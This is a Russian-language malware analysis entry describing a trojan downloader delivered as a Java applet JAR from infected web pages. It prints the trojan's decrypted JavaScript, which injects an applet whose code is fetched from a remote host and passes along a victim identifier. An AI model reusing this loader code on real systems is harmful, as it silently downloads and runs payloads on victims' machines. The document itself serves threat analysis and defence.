Троянская программа, загружающая файлы из сети Интернет без ведома пользователя.
Технические детали
Троянская программа, загружающая файлы из сети Интернет без ведома пользователя. Является JAR-архивом, содержащим набор Java-классов (class-файлы). Имеет размер 3556 байт.
Деструктивная активность
Вредоносный JAR-архив содержит следующий набор файлов:
Meta-inf\Manifest.mf (25 байт)
applet.class (5482 байта)
util.class (407 байт)
Основной функционал вредоноса реализован в классе "applet". Вредонос является Java-апплетом и запускается с зараженной HTML-страницы при помощи тега "<APPLET>". Вредоносный апплет запускается с двумя параметрами:
id
uid
Троянец содержит в своем теле в зашифрованном виде скрипт языка JavaScript. После запуска троянец расшифровывает данный скрипт и запускает его при помощи функции:
getAppletContext().showDocument
Расшифрованный скрипт имеет следующий вид:
javascript:function fudBfudW()
{
try
{
var antgantd=document.createElement('applet');
antgantd.setAttribute('codebase', 'file:C:\\Program Files\\
Java\\jre6\\lib\\ext');
antgantd.setAttribute('code', 'http://<значение параметра
"id">/options');
buyvbuyc=document.createElement('param');
buyvbuyc.setAttribute('name', 'uid');
buyvbuyc.setAttribute('value', '<значение параметра " uid">');
antgantd.appendChild(buyvbuyc);
document.body.appendChild(antgantd);
}
catch(e)
{
document.write('');
setTimeout(fudBfudW, 1000);
};
};
fudBfudW();
Таким образом, запуск скрипта приводит к запуску Java-апплета, class-файл которого расположен по адресу:
http://<значение параметра "id">/options
Апплет будет запущен с параметром "uid", значение которого равно переданному вредоносному апплету параметру "uid".
Собираем и анализируем опыт профессионалов ИБ